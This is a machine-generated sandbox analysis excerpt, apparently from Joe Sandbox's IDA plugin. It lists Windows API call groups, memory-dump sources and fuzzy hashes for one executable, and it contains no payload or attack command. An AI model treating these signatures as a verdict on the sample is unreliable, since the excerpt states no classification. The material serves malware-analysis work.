• _free.LIBCMT ref: 009C311E
• _free.LIBCMT ref: 009C3146
• SetLastError.KERNEL32(00000000,?,00000000), ref: 009C3153
• SetLastError.KERNEL32(00000000,?,00000000), ref: 009C315F
• _abort.LIBCMT ref: 009C3165
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: ErrorLast$_free$_abort
• String ID:
• API String ID: 3160817290-0
• Opcode ID: df075e4a6e0136532d5d15033b5af07e79f1e816dc844c9ad72eb916580de995
                                                                                                                                                                                                                                  • Instruction ID: 4dd17e5aabcae5d52e10fb77b20cc5be093f90c90b316747f28cb7bd8e21f0c1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: df075e4a6e0136532d5d15033b5af07e79f1e816dc844c9ad72eb916580de995
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B1F02D35D4C6002FD221A779AC06F6E166DAFC0771B38C52CF914D21D2EF2489034263
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00991F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00991F87
                                                                                                                                                                                                                                    • Part of subcall function 00991F2D: SelectObject.GDI32(?,00000000), ref: 00991F96
                                                                                                                                                                                                                                    • Part of subcall function 00991F2D: BeginPath.GDI32(?), ref: 00991FAD
                                                                                                                                                                                                                                    • Part of subcall function 00991F2D: SelectObject.GDI32(?,00000000), ref: 00991FD6
                                                                                                                                                                                                                                  • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00A294AA
                                                                                                                                                                                                                                  • LineTo.GDI32(?,00000003,00000000), ref: 00A294BE
                                                                                                                                                                                                                                  • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00A294CC
                                                                                                                                                                                                                                  • LineTo.GDI32(?,00000000,00000003), ref: 00A294DC
                                                                                                                                                                                                                                  • EndPath.GDI32(?), ref: 00A294EC
                                                                                                                                                                                                                                  • StrokePath.GDI32(?), ref: 00A294FC
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 43455801-0
                                                                                                                                                                                                                                  • Opcode ID: 3dabd882ff72a938e9b191b0a6259c45179d8fc0862e9fbb48c098adbdb393c5
                                                                                                                                                                                                                                  • Instruction ID: 2eefcd009b1b170ba75b942c796c689028a51c021ef9bb64032eb2531bfdfdd2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3dabd882ff72a938e9b191b0a6259c45179d8fc0862e9fbb48c098adbdb393c5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D811DB7600411DBFDF129F94EC89FAA7F6DEB08364F048021FA1A5A1B1C7719D56DBA0
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetDC.USER32(00000000), ref: 009F5B7C
                                                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 009F5B8D
                                                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 009F5B94
                                                                                                                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 009F5B9C
                                                                                                                                                                                                                                  • MulDiv.KERNEL32(000009EC,?,00000000), ref: 009F5BB3
                                                                                                                                                                                                                                  • MulDiv.KERNEL32(000009EC,00000001,?), ref: 009F5BC5
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CapsDevice$Release
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1035833867-0
                                                                                                                                                                                                                                  • Opcode ID: 5864d66facc39a7f2c3457bbe9c229775c2c9d45ba81b4c717fe2c33a957c4a5
                                                                                                                                                                                                                                  • Instruction ID: e23c608a63cf960e4c10915e88e7e3decdfe469013099f815560b017e623c99c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5864d66facc39a7f2c3457bbe9c229775c2c9d45ba81b4c717fe2c33a957c4a5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 07014475A00718BBEB109BE99C49F5EBF78EB44751F104065FB05A7291D6709C02CB90
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 009932AF
                                                                                                                                                                                                                                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 009932B7
                                                                                                                                                                                                                                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 009932C2
                                                                                                                                                                                                                                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 009932CD
                                                                                                                                                                                                                                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 009932D5
                                                                                                                                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 009932DD
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Virtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4278518827-0
                                                                                                                                                                                                                                  • Opcode ID: 09c92ace313e0d184d944100d6005fb9bdb9fae574bcf16d2c5436cd0ccaf6e1
                                                                                                                                                                                                                                  • Instruction ID: 8393ef8ad42879c18f1769cbfe50562581c3656c8bb438ce9c60bc4cc9836634
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 09c92ace313e0d184d944100d6005fb9bdb9fae574bcf16d2c5436cd0ccaf6e1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 090167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C4BA42C7F5A864CBE5
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 009FF447
                                                                                                                                                                                                                                  • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 009FF45D
                                                                                                                                                                                                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 009FF46C
                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009FF47B
                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009FF485
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009FF48C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 839392675-0
                                                                                                                                                                                                                                  • Opcode ID: 5c935920c396d1ab3bfb446e6250e4d9247c6533e3d39817082ab25272d33634
                                                                                                                                                                                                                                  • Instruction ID: 91b5c5711f3edaafb366e7ba4906b6e3101bae1afd6d9d8f6eaf1f15d56726a2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5c935920c396d1ab3bfb446e6250e4d9247c6533e3d39817082ab25272d33634
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 43F03A32241158BBE7319BA69C0EEFF3B7CEFC6B11F000168FA0191092D7A46A43C6B5
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetClientRect.USER32(?), ref: 009D34EF
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001328,00000000,?), ref: 009D3506
                                                                                                                                                                                                                                  • GetWindowDC.USER32(?), ref: 009D3512
                                                                                                                                                                                                                                  • GetPixel.GDI32(00000000,?,?), ref: 009D3521
                                                                                                                                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 009D3533
                                                                                                                                                                                                                                  • GetSysColor.USER32(00000005), ref: 009D354D
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 272304278-0
                                                                                                                                                                                                                                  • Opcode ID: 112d105ed7c4ca1b03f5030f89b3a58f87eae4347e2bbc6a59b80130262ac27a
                                                                                                                                                                                                                                  • Instruction ID: 568a170f10078a0a6fa72245eb83e92e510534e1c2124a54b72be472fdd5a89b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 112d105ed7c4ca1b03f5030f89b3a58f87eae4347e2bbc6a59b80130262ac27a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3F014B31540105EFDB609FA8DC08BF97FB5FB04321F504571F91AA22A2CB751E53AB11
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 009F21CC
                                                                                                                                                                                                                                  • UnloadUserProfile.USERENV(?,?), ref: 009F21D8
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 009F21E1
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 009F21E9
                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 009F21F2
                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 009F21F9
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 146765662-0
                                                                                                                                                                                                                                  • Opcode ID: 3fba248c381a700590c7a42ee1bf7f00da418c995e5e701086f4cbc9f14ef60e
                                                                                                                                                                                                                                  • Instruction ID: 05be635b55dc3e22ff3cf09b00414d677082175400956522287f7661f051ff6e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3fba248c381a700590c7a42ee1bf7f00da418c995e5e701086f4cbc9f14ef60e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FCE0E576004105BBDB119FE9EC0D92ABF39FF49322B104230F22586471CB329433DB90
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 009941EA: _wcslen.LIBCMT ref: 009941EF
                                                                                                                                                                                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 009FCF99
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 009FCFE0
                                                                                                                                                                                                                                  • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 009FD047
                                                                                                                                                                                                                                  • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 009FD075
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ItemMenu$Info_wcslen$Default
                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                  • API String ID: 1227352736-4108050209
                                                                                                                                                                                                                                  • Opcode ID: ad14f0518bb964f3baa5217173f5fff88ba4dc4896ebc2c1d7fb0a21609b69fe
                                                                                                                                                                                                                                  • Instruction ID: cea92b53e7852a571efed114d42117a3eda8f0e3fa0fa86e59396b44794a09a8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ad14f0518bb964f3baa5217173f5fff88ba4dc4896ebc2c1d7fb0a21609b69fe
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4351E1716063089BD725EF28C945B7BB7E9AF85324F080A2DFA91D3191DB74CD068752
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ShellExecuteExW.SHELL32(0000003C), ref: 00A1B903
                                                                                                                                                                                                                                    • Part of subcall function 009941EA: _wcslen.LIBCMT ref: 009941EF
                                                                                                                                                                                                                                  • GetProcessId.KERNEL32(00000000), ref: 00A1B998
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00A1B9C7
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                                                                                                                                                  • String ID: <$@
                                                                                                                                                                                                                                  • API String ID: 146682121-1426351568
                                                                                                                                                                                                                                  • Opcode ID: 21a0ae7a3bd1aca6e0467feb4bb24787d9053737bf12a2b47a0b174130346906
                                                                                                                                                                                                                                  • Instruction ID: 2c16ae91db7284abbe5ce12ebbdfecd6458b9f45339563551ca94f9331e43b6b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 21a0ae7a3bd1aca6e0467feb4bb24787d9053737bf12a2b47a0b174130346906
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 05714975A00215DFCF14EF98C495A9EBBB5BF48310F048499E855AB252CB75ED82CBA0
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 009F7B6D
                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 009F7BA3
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 009F7BB4
                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 009F7C36
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: ErrorMode$AddressCreateInstanceProc
• String ID: DllGetClassObject
• API String ID: 753597075-1075368562
• Opcode ID: 912bf4a2eb9c2baa2584349c42befe5188daad9e1a09f057f89dc1aecf3c6669
• Instruction ID: b4c59e503424da3998976dadfe5a47a626b3ee96562936d86b733ed56df7714d
• Opcode Fuzzy Hash: 912bf4a2eb9c2baa2584349c42befe5188daad9e1a09f057f89dc1aecf3c6669
• Instruction Fuzzy Hash: 4B41A0B1604208EFDB15CFA4D884ABABBB9EF44314F1484A9AE05DF346D7B0DD44CBA0
APIs
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A248D1
• IsMenu.USER32(?), ref: 00A248E6
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00A2492E
• DrawMenuBar.USER32 ref: 00A24941
Strings
Similarity
• API ID: Menu$Item$DrawInfoInsert
• String ID: 0
• API String ID: 3076010158-4108050209
• Opcode ID: acf706e207be19234a6d97b6c8f177dccd4038b3549be59df099003529702dc6
• Instruction ID: 294a135689928c7ac67b78b1c79a976c52495721dcd4d20f592c5caefca32a38
• Opcode Fuzzy Hash: acf706e207be19234a6d97b6c8f177dccd4038b3549be59df099003529702dc6
• Instruction Fuzzy Hash: 9D414C79A00619EFDB10CF99E884AAA7BB5FF09324F044129FD4597250C770ED95CFA0
APIs
  • Part of subcall function 0099B329: _wcslen.LIBCMT ref: 0099B333
  • Part of subcall function 009F45FD: GetClassNameW.USER32(?,?,000000FF), ref: 009F4620
• SendMessageW.USER32(?,00000188,00000000,00000000), ref: 009F27B3
• SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 009F27C6
• SendMessageW.USER32(?,00000189,?,00000000), ref: 009F27F6
  • Part of subcall function 00998577: _wcslen.LIBCMT ref: 0099858A
Strings
Similarity
• API ID: MessageSend$_wcslen$ClassName
• String ID: ComboBox$ListBox
• API String ID: 2081771294-1403004172
• Opcode ID: a3bfbab4f0b8fcd805398cb3287163b78023ff7749e2afb27baf0bd8c0c3178b
• Instruction ID: 131030688c84d0b4e0144a968219285ba0556a9adb2e13bbbba45b616f146a7b
• Opcode Fuzzy Hash: a3bfbab4f0b8fcd805398cb3287163b78023ff7749e2afb27baf0bd8c0c3178b
• Instruction Fuzzy Hash: CB21E571940108BEDB15ABA8DC46EFF7BBCDF853A0F104529F922A71E1CB38490AD760
APIs
• SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00A23A29
• LoadLibraryW.KERNEL32(?), ref: 00A23A30
• SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00A23A45
• DestroyWindow.USER32(?), ref: 00A23A4D
Strings
Similarity
• API ID: MessageSend$DestroyLibraryLoadWindow
• String ID: SysAnimate32
• API String ID: 3529120543-1011021900
• Opcode ID: de9010f8e9a01593ca840acb5467848c801160ac2186ff2a40e6d73744797d5a
• Instruction ID: 8eb52558e351736a243bd54a7f2f87d1f36cab8d6d00f7d84f3949b80638c0aa
• Opcode Fuzzy Hash: de9010f8e9a01593ca840acb5467848c801160ac2186ff2a40e6d73744797d5a
• Instruction Fuzzy Hash: 4521A472500215AFEF109FA8EC90FBB77A9EB4A3A4F105634FA9196190C776CD819750
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,009B508E,?,?,009B502E,?,00A598D8,0000000C,009B5185,?,00000002), ref: 009B50FD
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 009B5110
• FreeLibrary.KERNEL32(00000000,?,?,?,009B508E,?,?,009B502E,?,00A598D8,0000000C,009B5185,?,00000002,00000000), ref: 009B5133
Strings
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: 8f9c10e6d8ec5946162a24c6571bec79686aa0111688a1150fa1faec7454a608
• Instruction ID: 8f953f5621df1199185844ea5983c69e8ebfaa9b7308f7763ad758aa0b864f57
• Opcode Fuzzy Hash: 8f9c10e6d8ec5946162a24c6571bec79686aa0111688a1150fa1faec7454a608
• Instruction Fuzzy Hash: 2BF06830900208BBDB21DFD8DD49BEDBFB8EF44762F050164F805A61A0DB759D52CA90
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,?,0099668B,?,?,009962FA,?,00000001,?,?,00000000), ref: 0099664A
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0099665C
• FreeLibrary.KERNEL32(00000000,?,?,0099668B,?,?,009962FA,?,00000001,?,?,00000000), ref: 0099666E
Strings
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                  • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                  • API String ID: 145871493-3689287502
                                                                                                                                                                                                                                  • Opcode ID: d67a477d4fb71f7a4298e8833de9646252fdf8bbc7ea6d9b2bcf5bee230c62e2
                                                                                                                                                                                                                                  • Instruction ID: 1f09e2183a9f5bc94adad67f4f060382dbedb799c9bb705f43c44981974df0b2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d67a477d4fb71f7a4298e8833de9646252fdf8bbc7ea6d9b2bcf5bee230c62e2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BDE0C236602632679732276DBC0CBBE662CAF82F26B050335FC00E2200DFA0CC0380E4
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,?,009D5657,?,?,009962FA,?,00000001,?,?,00000000), ref: 00996610
• GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00996622
• FreeLibrary.KERNEL32(00000000,?,?,009D5657,?,?,009962FA,?,00000001,?,?,00000000), ref: 00996635
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: Wow64RevertWow64FsRedirection$kernel32.dll
• API String ID: 145871493-1355242751
• Opcode ID: 6546a6ffdd4f18d96c0ecd8e85191a01febe08f8422c4293ddb02a996eb4be46
• Instruction ID: 86390a0922fb6da4edc55447faa465e6eaa08819feccb038cbe88e0d24ef2d24
• Opcode Fuzzy Hash: 6546a6ffdd4f18d96c0ecd8e85191a01febe08f8422c4293ddb02a996eb4be46
